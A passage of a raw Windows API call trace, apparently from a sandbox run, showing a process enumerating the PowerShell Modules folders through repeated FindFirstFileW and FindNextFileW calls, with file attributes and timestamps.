lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management", cAlternateFileName="MICROS~2.MAN")) returned 1 [0140.066] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMAgent", cAlternateFileName="")) returned 1 [0140.067] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc", cAlternateFileName="")) returned 1 [0140.067] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter", cAlternateFileName="NETADA~1")) returned 1 [0140.067] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetConnection", cAlternateFileName="NETCON~1")) returned 1 [0140.069] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture", cAlternateFileName="NETEVE~1")) returned 1 [0140.069] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo", cAlternateFileName="")) returned 1 [0140.069] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat", cAlternateFileName="")) returned 1 [0140.069] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos", cAlternateFileName="")) returned 1 [0140.070] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity", cAlternateFileName="NETSEC~1")) returned 1 [0140.070] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa59c748, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa59c748, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSwitchTeam", cAlternateFileName="NETSWI~1")) returned 1 [0140.070] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5c29a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5c29a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetTCPIP", cAlternateFileName="")) returned 1 [0140.070] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13483f1, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13483f1, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkConnectivityStatus", cAlternateFileName="NETWOR~1")) returned 1 [0140.070] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchManager", cAlternateFileName="NETWOR~2")) returned 1 [0140.071] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13948a6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13948a6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkTransition", cAlternateFileName="NETWOR~3")) returned 1 [0140.071] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PcsvDevice", cAlternateFileName="PCSVDE~1")) returned 1 [0140.071] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PKI", cAlternateFileName="")) returned 1 [0140.071] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PnpDevice", cAlternateFileName="PNPDEV~1")) returned 1 [0140.071] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6350b6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6350b6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrintManagement", cAlternateFileName="PRINTM~1")) returned 1 [0140.072] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration", cAlternateFileName="PSDESI~1")) returned 1 [0140.072] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDiagnostics", cAlternateFileName="PSDIAG~1")) returned 1 [0140.072] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob", cAlternateFileName="PSSCHE~1")) returned 1 [0140.072] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflow", cAlternateFileName="PSWORK~1")) returned 1 [0140.072] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflowUtility", cAlternateFileName="PSWORK~2")) returned 1 [0140.073] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa719ec9, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa719ec9, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ScheduledTasks", cAlternateFileName="SCHEDU~1")) returned 1 [0140.073] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecureBoot", cAlternateFileName="SECURE~1")) returned 1 [0140.073] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare", cAlternateFileName="")) returned 1 [0140.073] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness", cAlternateFileName="SMBWIT~1")) returned 1 [0140.073] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout", cAlternateFileName="STARTL~1")) returned 1 [0140.073] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa78c5d5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa78c5d5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage", cAlternateFileName="")) returned 1 [0140.074] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TLS", cAlternateFileName="")) returned 1 [0140.074] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack", cAlternateFileName="TROUBL~1")) returned 1 [0140.074] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TrustedPlatformModule", cAlternateFileName="TRUSTE~1")) returned 1 [0140.074] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VpnClient", cAlternateFileName="VPNCLI~1")) returned 1 [0140.074] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wdac", cAlternateFileName="")) returned 1 [0140.075] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsDeveloperLicense", cAlternateFileName="WINDOW~1")) returned 1 [0140.075] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsErrorReporting", cAlternateFileName="WINDOW~2")) returned 1 [0140.075] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsSearch", cAlternateFileName="WINDOW~3")) returned 1 [0140.075] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsUpdate", cAlternateFileName="WINDOW~4")) returned 1 [0140.075] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0140.075] FindClose (in: hFindFile=0x1e3371a29c0 | out: hFindFile=0x1e3371a29c0) returned 1 [0140.076] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8ddf0) returned 1 [0140.076] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8ddb0) returned 1 [0140.076] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dec0) returned 1 [0140.076] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8d9a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0140.077] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\*"), lpFindFileData=0xb156f8dbd0 | out: lpFindFileData=0xb156f8dbd0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e3371a20c0 [0140.077] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.077] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask", cAlternateFileName="APPBAC~1")) returned 1 [0140.077] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker", cAlternateFileName="APPLOC~1")) returned 1 [0140.078] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx", cAlternateFileName="")) returned 1 [0140.078] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: 